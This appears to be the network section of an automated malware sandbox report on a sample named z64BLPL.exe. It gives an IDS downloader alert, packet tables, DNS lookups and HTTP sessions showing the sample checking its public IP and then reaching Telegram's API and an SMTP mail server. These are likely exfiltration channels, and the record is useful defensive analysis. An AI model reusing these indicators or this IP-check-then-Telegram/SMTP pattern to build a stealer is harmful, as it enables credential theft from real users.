2024-09-26T17:10:45.099812+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49750	193.122.6.168	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 26, 2024 17:09:58.206500053 CEST	49730	80	192.168.2.4	193.122.6.168
Sep 26, 2024 17:09:58.211630106 CEST	80	49730	193.122.6.168	192.168.2.4
Sep 26, 2024 17:09:58.211724043 CEST	49730	80	192.168.2.4	193.122.6.168
Sep 26, 2024 17:09:58.211992025 CEST	49730	80	192.168.2.4	193.122.6.168
Sep 26, 2024 17:09:58.217827082 CEST	80	49730	193.122.6.168	192.168.2.4
Sep 26, 2024 17:09:58.880146980 CEST	80	49730	193.122.6.168	192.168.2.4
Sep 26, 2024 17:09:58.885175943 CEST	49730	80	192.168.2.4	193.122.6.168
Sep 26, 2024 17:09:58.895159960 CEST	80	49730	193.122.6.168	192.168.2.4
Sep 26, 2024 17:09:59.077944040 CEST	80	49730	193.122.6.168	192.168.2.4
Sep 26, 2024 17:09:59.130991936 CEST	49730	80	192.168.2.4	193.122.6.168
Sep 26, 2024 17:09:59.139976025 CEST	49731	443	192.168.2.4	188.114.97.3
Sep 26, 2024 17:09:59.139998913 CEST	443	49731	188.114.97.3	192.168.2.4
Sep 26, 2024 17:09:59.140070915 CEST	49731	443	192.168.2.4	188.114.97.3
Sep 26, 2024 17:09:59.149842024 CEST	49731	443	192.168.2.4	188.114.97.3
Sep 26, 2024 17:09:59.149857044 CEST	443	49731	188.114.97.3	192.168.2.4
Sep 26, 2024 17:09:59.654016018 CEST	443	49731	188.114.97.3	192.168.2.4
Sep 26, 2024 17:09:59.654151917 CEST	49731	443	192.168.2.4	188.114.97.3
Sep 26, 2024 17:09:59.660387993 CEST	49731	443	192.168.2.4	188.114.97.3
Sep 26, 2024 17:09:59.660410881 CEST	443	49731	188.114.97.3	192.168.2.4
Sep 26, 2024 17:09:59.660840034 CEST	443	49731	188.114.97.3	192.168.2.4
Sep 26, 2024 17:09:59.709083080 CEST	49731	443	192.168.2.4	188.114.97.3
Sep 26, 2024 17:10:00.183356047 CEST	49731	443	192.168.2.4	188.114.97.3
Sep 26, 2024 17:10:00.223400116 CEST	443	49731	188.114.97.3	192.168.2.4
Sep 26, 2024 17:10:00.309858084 CEST	443	49731	188.114.97.3	192.168.2.4
Sep 26, 2024 17:10:00.309971094 CEST	443	49731	188.114.97.3	192.168.2.4
Sep 26, 2024 17:10:00.310082912 CEST	49731	443	192.168.2.4	188.114.97.3
Sep 26, 2024 17:10:00.317410946 CEST	49731	443	192.168.2.4	188.114.97.3
Sep 26, 2024 17:10:00.320966005 CEST	49730	80	192.168.2.4	193.122.6.168
Sep 26, 2024 17:10:00.326773882 CEST	80	49730	193.122.6.168	192.168.2.4
Sep 26, 2024 17:10:00.527089119 CEST	80	49730	193.122.6.168	192.168.2.4
Sep 26, 2024 17:10:00.531579018 CEST	49732	443	192.168.2.4	188.114.97.3
Sep 26, 2024 17:10:00.531611919 CEST	443	49732	188.114.97.3	192.168.2.4
Sep 26, 2024 17:10:00.531682968 CEST	49732	443	192.168.2.4	188.114.97.3
Sep 26, 2024 17:10:00.532172918 CEST	49732	443	192.168.2.4	188.114.97.3
Sep 26, 2024 17:10:00.532185078 CEST	443	49732	188.114.97.3	192.168.2.4
Sep 26, 2024 17:10:00.568500042 CEST	49730	80	192.168.2.4	193.122.6.168
Sep 26, 2024 17:10:01.030261040 CEST	443	49732	188.114.97.3	192.168.2.4
Sep 26, 2024 17:10:01.032318115 CEST	49732	443	192.168.2.4	188.114.97.3
Sep 26, 2024 17:10:01.032335043 CEST	443	49732	188.114.97.3	192.168.2.4
Sep 26, 2024 17:10:01.211050987 CEST	443	49732	188.114.97.3	192.168.2.4
Sep 26, 2024 17:10:01.211169004 CEST	443	49732	188.114.97.3	192.168.2.4
Sep 26, 2024 17:10:01.211317062 CEST	49732	443	192.168.2.4	188.114.97.3
Sep 26, 2024 17:10:01.211633921 CEST	49732	443	192.168.2.4	188.114.97.3
Sep 26, 2024 17:10:01.214828014 CEST	49730	80	192.168.2.4	193.122.6.168
Sep 26, 2024 17:10:01.215993881 CEST	49733	80	192.168.2.4	193.122.6.168
Sep 26, 2024 17:10:01.220967054 CEST	80	49730	193.122.6.168	192.168.2.4
Sep 26, 2024 17:10:01.220978975 CEST	80	49733	193.122.6.168	192.168.2.4
Sep 26, 2024 17:10:01.221060038 CEST	49730	80	192.168.2.4	193.122.6.168
Sep 26, 2024 17:10:01.221093893 CEST	49733	80	192.168.2.4	193.122.6.168
Sep 26, 2024 17:10:01.221191883 CEST	49733	80	192.168.2.4	193.122.6.168
Sep 26, 2024 17:10:01.226352930 CEST	80	49733	193.122.6.168	192.168.2.4
Sep 26, 2024 17:10:22.602520943 CEST	80	49733	193.122.6.168	192.168.2.4
Sep 26, 2024 17:10:22.605931044 CEST	49733	80	192.168.2.4	193.122.6.168
Sep 26, 2024 17:10:22.612098932 CEST	49733	80	192.168.2.4	193.122.6.168
Sep 26, 2024 17:10:22.614058018 CEST	49740	80	192.168.2.4	193.122.6.168
Sep 26, 2024 17:10:22.616991043 CEST	80	49733	193.122.6.168	192.168.2.4
Sep 26, 2024 17:10:22.619029045 CEST	80	49740	193.122.6.168	192.168.2.4
Sep 26, 2024 17:10:22.622540951 CEST	49740	80	192.168.2.4	193.122.6.168
Sep 26, 2024 17:10:22.622690916 CEST	49740	80	192.168.2.4	193.122.6.168
Sep 26, 2024 17:10:22.627482891 CEST	80	49740	193.122.6.168	192.168.2.4
Sep 26, 2024 17:10:31.285698891 CEST	80	49740	193.122.6.168	192.168.2.4
Sep 26, 2024 17:10:31.287059069 CEST	49741	443	192.168.2.4	188.114.97.3
Sep 26, 2024 17:10:31.287173033 CEST	443	49741	188.114.97.3	192.168.2.4
Sep 26, 2024 17:10:31.287324905 CEST	49741	443	192.168.2.4	188.114.97.3
Sep 26, 2024 17:10:31.287621021 CEST	49741	443	192.168.2.4	188.114.97.3
Sep 26, 2024 17:10:31.287658930 CEST	443	49741	188.114.97.3	192.168.2.4
Sep 26, 2024 17:10:31.334224939 CEST	49740	80	192.168.2.4	193.122.6.168
Sep 26, 2024 17:10:31.755745888 CEST	443	49741	188.114.97.3	192.168.2.4
Sep 26, 2024 17:10:31.765150070 CEST	49741	443	192.168.2.4	188.114.97.3
Sep 26, 2024 17:10:31.765259027 CEST	443	49741	188.114.97.3	192.168.2.4
Sep 26, 2024 17:10:31.907733917 CEST	443	49741	188.114.97.3	192.168.2.4
Sep 26, 2024 17:10:31.907836914 CEST	443	49741	188.114.97.3	192.168.2.4
Sep 26, 2024 17:10:31.907913923 CEST	49741	443	192.168.2.4	188.114.97.3
Sep 26, 2024 17:10:31.908370972 CEST	49741	443	192.168.2.4	188.114.97.3
Sep 26, 2024 17:10:31.911853075 CEST	49740	80	192.168.2.4	193.122.6.168
Sep 26, 2024 17:10:31.912946939 CEST	49742	80	192.168.2.4	193.122.6.168
Sep 26, 2024 17:10:31.916982889 CEST	80	49740	193.122.6.168	192.168.2.4
Sep 26, 2024 17:10:31.917054892 CEST	49740	80	192.168.2.4	193.122.6.168
Sep 26, 2024 17:10:31.917776108 CEST	80	49742	193.122.6.168	192.168.2.4
Sep 26, 2024 17:10:31.917862892 CEST	49742	80	192.168.2.4	193.122.6.168
Sep 26, 2024 17:10:31.917932987 CEST	49742	80	192.168.2.4	193.122.6.168
Sep 26, 2024 17:10:31.922975063 CEST	80	49742	193.122.6.168	192.168.2.4
Sep 26, 2024 17:10:35.905607939 CEST	80	49742	193.122.6.168	192.168.2.4
Sep 26, 2024 17:10:35.905626059 CEST	80	49742	193.122.6.168	192.168.2.4
Sep 26, 2024 17:10:35.905706882 CEST	49742	80	192.168.2.4	193.122.6.168
Sep 26, 2024 17:10:35.914891958 CEST	49742	80	192.168.2.4	193.122.6.168
Sep 26, 2024 17:10:35.919748068 CEST	80	49742	193.122.6.168	192.168.2.4
Sep 26, 2024 17:10:36.537620068 CEST	80	49742	193.122.6.168	192.168.2.4
Sep 26, 2024 17:10:36.538822889 CEST	49743	443	192.168.2.4	188.114.97.3
Sep 26, 2024 17:10:36.538867950 CEST	443	49743	188.114.97.3	192.168.2.4
Sep 26, 2024 17:10:36.538954020 CEST	49743	443	192.168.2.4	188.114.97.3
Sep 26, 2024 17:10:36.539254904 CEST	49743	443	192.168.2.4	188.114.97.3
Sep 26, 2024 17:10:36.539269924 CEST	443	49743	188.114.97.3	192.168.2.4
Sep 26, 2024 17:10:36.584155083 CEST	49742	80	192.168.2.4	193.122.6.168
Sep 26, 2024 17:10:37.010214090 CEST	443	49743	188.114.97.3	192.168.2.4
Sep 26, 2024 17:10:37.017998934 CEST	49743	443	192.168.2.4	188.114.97.3
Sep 26, 2024 17:10:37.018044949 CEST	443	49743	188.114.97.3	192.168.2.4
Sep 26, 2024 17:10:37.160572052 CEST	443	49743	188.114.97.3	192.168.2.4
Sep 26, 2024 17:10:37.160738945 CEST	443	49743	188.114.97.3	192.168.2.4
Sep 26, 2024 17:10:37.160809040 CEST	49743	443	192.168.2.4	188.114.97.3
Sep 26, 2024 17:10:37.161380053 CEST	49743	443	192.168.2.4	188.114.97.3
Sep 26, 2024 17:10:37.164859056 CEST	49742	80	192.168.2.4	193.122.6.168
Sep 26, 2024 17:10:37.166100025 CEST	49744	80	192.168.2.4	193.122.6.168
Sep 26, 2024 17:10:37.170149088 CEST	80	49742	193.122.6.168	192.168.2.4
Sep 26, 2024 17:10:37.170243025 CEST	49742	80	192.168.2.4	193.122.6.168
Sep 26, 2024 17:10:37.170954943 CEST	80	49744	193.122.6.168	192.168.2.4
Sep 26, 2024 17:10:37.171041012 CEST	49744	80	192.168.2.4	193.122.6.168
Sep 26, 2024 17:10:37.171185017 CEST	49744	80	192.168.2.4	193.122.6.168
Sep 26, 2024 17:10:37.176091909 CEST	80	49744	193.122.6.168	192.168.2.4
Sep 26, 2024 17:10:38.807979107 CEST	80	49744	193.122.6.168	192.168.2.4
Sep 26, 2024 17:10:38.809443951 CEST	49745	443	192.168.2.4	188.114.97.3
Sep 26, 2024 17:10:38.809549093 CEST	443	49745	188.114.97.3	192.168.2.4
Sep 26, 2024 17:10:38.809798956 CEST	49745	443	192.168.2.4	188.114.97.3
Sep 26, 2024 17:10:38.809967995 CEST	49745	443	192.168.2.4	188.114.97.3
Sep 26, 2024 17:10:38.810002089 CEST	443	49745	188.114.97.3	192.168.2.4
Sep 26, 2024 17:10:38.849812984 CEST	49744	80	192.168.2.4	193.122.6.168
Sep 26, 2024 17:10:39.333060980 CEST	443	49745	188.114.97.3	192.168.2.4
Sep 26, 2024 17:10:39.335103035 CEST	49745	443	192.168.2.4	188.114.97.3
Sep 26, 2024 17:10:39.335130930 CEST	443	49745	188.114.97.3	192.168.2.4
Sep 26, 2024 17:10:39.473113060 CEST	443	49745	188.114.97.3	192.168.2.4
Sep 26, 2024 17:10:39.473263979 CEST	443	49745	188.114.97.3	192.168.2.4
Sep 26, 2024 17:10:39.473336935 CEST	49745	443	192.168.2.4	188.114.97.3
Sep 26, 2024 17:10:39.473687887 CEST	49745	443	192.168.2.4	188.114.97.3
Sep 26, 2024 17:10:39.476654053 CEST	49744	80	192.168.2.4	193.122.6.168
Sep 26, 2024 17:10:39.478049040 CEST	49746	80	192.168.2.4	193.122.6.168
Sep 26, 2024 17:10:39.482548952 CEST	80	49744	193.122.6.168	192.168.2.4
Sep 26, 2024 17:10:39.482614994 CEST	49744	80	192.168.2.4	193.122.6.168
Sep 26, 2024 17:10:39.483913898 CEST	80	49746	193.122.6.168	192.168.2.4
Sep 26, 2024 17:10:39.483997107 CEST	49746	80	192.168.2.4	193.122.6.168
Sep 26, 2024 17:10:39.484121084 CEST	49746	80	192.168.2.4	193.122.6.168
Sep 26, 2024 17:10:39.490559101 CEST	80	49746	193.122.6.168	192.168.2.4
Sep 26, 2024 17:10:42.134253025 CEST	80	49746	193.122.6.168	192.168.2.4
Sep 26, 2024 17:10:42.135741949 CEST	49747	443	192.168.2.4	188.114.97.3
Sep 26, 2024 17:10:42.135843992 CEST	443	49747	188.114.97.3	192.168.2.4
Sep 26, 2024 17:10:42.136008024 CEST	49747	443	192.168.2.4	188.114.97.3
Sep 26, 2024 17:10:42.136239052 CEST	49747	443	192.168.2.4	188.114.97.3
Sep 26, 2024 17:10:42.136271000 CEST	443	49747	188.114.97.3	192.168.2.4
Sep 26, 2024 17:10:42.177920103 CEST	49746	80	192.168.2.4	193.122.6.168
Sep 26, 2024 17:10:42.643096924 CEST	443	49747	188.114.97.3	192.168.2.4
Sep 26, 2024 17:10:42.644798994 CEST	49747	443	192.168.2.4	188.114.97.3
Sep 26, 2024 17:10:42.644854069 CEST	443	49747	188.114.97.3	192.168.2.4
Sep 26, 2024 17:10:42.866292000 CEST	443	49747	188.114.97.3	192.168.2.4
Sep 26, 2024 17:10:42.866406918 CEST	443	49747	188.114.97.3	192.168.2.4
Sep 26, 2024 17:10:42.866473913 CEST	49747	443	192.168.2.4	188.114.97.3
Sep 26, 2024 17:10:42.870654106 CEST	49747	443	192.168.2.4	188.114.97.3
Sep 26, 2024 17:10:42.899295092 CEST	49746	80	192.168.2.4	193.122.6.168
Sep 26, 2024 17:10:42.900207043 CEST	49748	80	192.168.2.4	193.122.6.168
Sep 26, 2024 17:10:42.940862894 CEST	80	49748	193.122.6.168	192.168.2.4
Sep 26, 2024 17:10:42.940983057 CEST	49748	80	192.168.2.4	193.122.6.168
Sep 26, 2024 17:10:42.941111088 CEST	49748	80	192.168.2.4	193.122.6.168
Sep 26, 2024 17:10:42.943008900 CEST	80	49746	193.122.6.168	192.168.2.4
Sep 26, 2024 17:10:42.943085909 CEST	49746	80	192.168.2.4	193.122.6.168
Sep 26, 2024 17:10:42.956279039 CEST	80	49748	193.122.6.168	192.168.2.4
Sep 26, 2024 17:10:43.617235899 CEST	80	49748	193.122.6.168	192.168.2.4
Sep 26, 2024 17:10:43.618619919 CEST	49749	443	192.168.2.4	188.114.97.3
Sep 26, 2024 17:10:43.618662119 CEST	443	49749	188.114.97.3	192.168.2.4
Sep 26, 2024 17:10:43.618773937 CEST	49749	443	192.168.2.4	188.114.97.3
Sep 26, 2024 17:10:43.619131088 CEST	49749	443	192.168.2.4	188.114.97.3
Sep 26, 2024 17:10:43.619144917 CEST	443	49749	188.114.97.3	192.168.2.4
Sep 26, 2024 17:10:43.662331104 CEST	49748	80	192.168.2.4	193.122.6.168
Sep 26, 2024 17:10:44.142925024 CEST	443	49749	188.114.97.3	192.168.2.4
Sep 26, 2024 17:10:44.144808054 CEST	49749	443	192.168.2.4	188.114.97.3
Sep 26, 2024 17:10:44.144829035 CEST	443	49749	188.114.97.3	192.168.2.4
Sep 26, 2024 17:10:44.323335886 CEST	443	49749	188.114.97.3	192.168.2.4
Sep 26, 2024 17:10:44.323504925 CEST	443	49749	188.114.97.3	192.168.2.4
Sep 26, 2024 17:10:44.323589087 CEST	49749	443	192.168.2.4	188.114.97.3
Sep 26, 2024 17:10:44.324064970 CEST	49749	443	192.168.2.4	188.114.97.3
Sep 26, 2024 17:10:44.327312946 CEST	49748	80	192.168.2.4	193.122.6.168
Sep 26, 2024 17:10:44.328552008 CEST	49750	80	192.168.2.4	193.122.6.168
Sep 26, 2024 17:10:44.332680941 CEST	80	49748	193.122.6.168	192.168.2.4
Sep 26, 2024 17:10:44.332761049 CEST	49748	80	192.168.2.4	193.122.6.168
Sep 26, 2024 17:10:44.334686041 CEST	80	49750	193.122.6.168	192.168.2.4
Sep 26, 2024 17:10:44.334762096 CEST	49750	80	192.168.2.4	193.122.6.168
Sep 26, 2024 17:10:44.334860086 CEST	49750	80	192.168.2.4	193.122.6.168
Sep 26, 2024 17:10:44.340409040 CEST	80	49750	193.122.6.168	192.168.2.4
Sep 26, 2024 17:10:45.045376062 CEST	80	49750	193.122.6.168	192.168.2.4
Sep 26, 2024 17:10:45.047786951 CEST	49751	443	192.168.2.4	188.114.97.3
Sep 26, 2024 17:10:45.047904015 CEST	443	49751	188.114.97.3	192.168.2.4
Sep 26, 2024 17:10:45.047998905 CEST	49751	443	192.168.2.4	188.114.97.3
Sep 26, 2024 17:10:45.048367023 CEST	49751	443	192.168.2.4	188.114.97.3
Sep 26, 2024 17:10:45.048402071 CEST	443	49751	188.114.97.3	192.168.2.4
Sep 26, 2024 17:10:45.099812031 CEST	49750	80	192.168.2.4	193.122.6.168
Sep 26, 2024 17:10:45.560137033 CEST	443	49751	188.114.97.3	192.168.2.4
Sep 26, 2024 17:10:45.561798096 CEST	49751	443	192.168.2.4	188.114.97.3
Sep 26, 2024 17:10:45.561867952 CEST	443	49751	188.114.97.3	192.168.2.4
Sep 26, 2024 17:10:45.708945990 CEST	443	49751	188.114.97.3	192.168.2.4
Sep 26, 2024 17:10:45.709058046 CEST	443	49751	188.114.97.3	192.168.2.4
Sep 26, 2024 17:10:45.709111929 CEST	49751	443	192.168.2.4	188.114.97.3
Sep 26, 2024 17:10:45.709484100 CEST	49751	443	192.168.2.4	188.114.97.3
Sep 26, 2024 17:10:45.730833054 CEST	49752	443	192.168.2.4	149.154.167.220
Sep 26, 2024 17:10:45.730907917 CEST	443	49752	149.154.167.220	192.168.2.4
Sep 26, 2024 17:10:45.730979919 CEST	49752	443	192.168.2.4	149.154.167.220
Sep 26, 2024 17:10:45.731292009 CEST	49752	443	192.168.2.4	149.154.167.220
Sep 26, 2024 17:10:45.731328964 CEST	443	49752	149.154.167.220	192.168.2.4
Sep 26, 2024 17:10:46.371262074 CEST	443	49752	149.154.167.220	192.168.2.4
Sep 26, 2024 17:10:46.371479988 CEST	49752	443	192.168.2.4	149.154.167.220
Sep 26, 2024 17:10:46.374813080 CEST	49752	443	192.168.2.4	149.154.167.220
Sep 26, 2024 17:10:46.374833107 CEST	443	49752	149.154.167.220	192.168.2.4
Sep 26, 2024 17:10:46.375344992 CEST	443	49752	149.154.167.220	192.168.2.4
Sep 26, 2024 17:10:46.376605034 CEST	49752	443	192.168.2.4	149.154.167.220
Sep 26, 2024 17:10:46.423396111 CEST	443	49752	149.154.167.220	192.168.2.4
Sep 26, 2024 17:10:46.663913965 CEST	443	49752	149.154.167.220	192.168.2.4
Sep 26, 2024 17:10:46.663986921 CEST	443	49752	149.154.167.220	192.168.2.4
Sep 26, 2024 17:10:46.664156914 CEST	49752	443	192.168.2.4	149.154.167.220
Sep 26, 2024 17:10:46.664468050 CEST	49752	443	192.168.2.4	149.154.167.220
Sep 26, 2024 17:10:51.925179005 CEST	49750	80	192.168.2.4	193.122.6.168
Sep 26, 2024 17:10:52.379081011 CEST	49753	25	192.168.2.4	192.250.231.25
Sep 26, 2024 17:10:53.381150007 CEST	49753	25	192.168.2.4	192.250.231.25
Sep 26, 2024 17:10:55.396852970 CEST	49753	25	192.168.2.4	192.250.231.25
Sep 26, 2024 17:10:59.412341118 CEST	49753	25	192.168.2.4	192.250.231.25
Sep 26, 2024 17:11:07.412394047 CEST	49753	25	192.168.2.4	192.250.231.25
Sep 26, 2024 17:11:14.947559118 CEST	49755	25	192.168.2.4	192.250.231.25
Sep 26, 2024 17:11:15.959227085 CEST	49755	25	192.168.2.4	192.250.231.25
Sep 26, 2024 17:11:17.959270000 CEST	49755	25	192.168.2.4	192.250.231.25
Sep 26, 2024 17:11:21.959280014 CEST	49755	25	192.168.2.4	192.250.231.25
Sep 26, 2024 17:11:29.959240913 CEST	49755	25	192.168.2.4	192.250.231.25

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 26, 2024 17:09:58.093405008 CEST	58686	53	192.168.2.4	1.1.1.1
Sep 26, 2024 17:09:58.199585915 CEST	53	58686	1.1.1.1	192.168.2.4
Sep 26, 2024 17:09:59.125065088 CEST	55657	53	192.168.2.4	1.1.1.1
Sep 26, 2024 17:09:59.139177084 CEST	53	55657	1.1.1.1	192.168.2.4
Sep 26, 2024 17:10:45.722960949 CEST	49318	53	192.168.2.4	1.1.1.1
Sep 26, 2024 17:10:45.730357885 CEST	53	49318	1.1.1.1	192.168.2.4
Sep 26, 2024 17:10:52.313168049 CEST	54363	53	192.168.2.4	1.1.1.1
Sep 26, 2024 17:10:52.378348112 CEST	53	54363	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Sep 26, 2024 17:09:58.093405008 CEST	192.168.2.4	1.1.1.1	0x28d5	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Sep 26, 2024 17:09:59.125065088 CEST	192.168.2.4	1.1.1.1	0x4664	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false
Sep 26, 2024 17:10:45.722960949 CEST	192.168.2.4	1.1.1.1	0x7b48	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false
Sep 26, 2024 17:10:52.313168049 CEST	192.168.2.4	1.1.1.1	0x61dd	Standard query (0)	mail.electradubai.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Sep 26, 2024 17:09:58.199585915 CEST	1.1.1.1	192.168.2.4	0x28d5	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Sep 26, 2024 17:09:58.199585915 CEST	1.1.1.1	192.168.2.4	0x28d5	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Sep 26, 2024 17:09:58.199585915 CEST	1.1.1.1	192.168.2.4	0x28d5	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Sep 26, 2024 17:09:58.199585915 CEST	1.1.1.1	192.168.2.4	0x28d5	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Sep 26, 2024 17:09:58.199585915 CEST	1.1.1.1	192.168.2.4	0x28d5	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Sep 26, 2024 17:09:58.199585915 CEST	1.1.1.1	192.168.2.4	0x28d5	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Sep 26, 2024 17:09:59.139177084 CEST	1.1.1.1	192.168.2.4	0x4664	No error (0)	reallyfreegeoip.org		188.114.97.3	A (IP address)	IN (0x0001)	false
Sep 26, 2024 17:09:59.139177084 CEST	1.1.1.1	192.168.2.4	0x4664	No error (0)	reallyfreegeoip.org		188.114.96.3	A (IP address)	IN (0x0001)	false
Sep 26, 2024 17:10:45.730357885 CEST	1.1.1.1	192.168.2.4	0x7b48	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false
Sep 26, 2024 17:10:52.378348112 CEST	1.1.1.1	192.168.2.4	0x61dd	No error (0)	mail.electradubai.com		192.250.231.25	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

reallyfreegeoip.org

api.telegram.org

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	193.122.6.168	80	7268	C:\Users\user\Desktop\z64BLPL.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 17:09:58.211992025 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Sep 26, 2024 17:09:58.880146980 CEST	320	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 15:09:58 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: c7ec0746c706975a27626e908c41cf88 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Sep 26, 2024 17:09:58.885175943 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Sep 26, 2024 17:09:59.077944040 CEST	320	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 15:09:58 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: e2d471029d84583ab5ea3172f41d4456 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Sep 26, 2024 17:10:00.320966005 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Sep 26, 2024 17:10:00.527089119 CEST	320	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 15:10:00 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 5575a820128f7002d0208294c3812756 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49733	193.122.6.168	80	7268	C:\Users\user\Desktop\z64BLPL.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 17:10:01.221191883 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49740	193.122.6.168	80	7268	C:\Users\user\Desktop\z64BLPL.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 17:10:22.622690916 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Sep 26, 2024 17:10:31.285698891 CEST	320	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 15:10:31 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: f7447a85838b06fac8a6cf5f4ea0eabc Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49742	193.122.6.168	80	7268	C:\Users\user\Desktop\z64BLPL.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 17:10:31.917932987 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
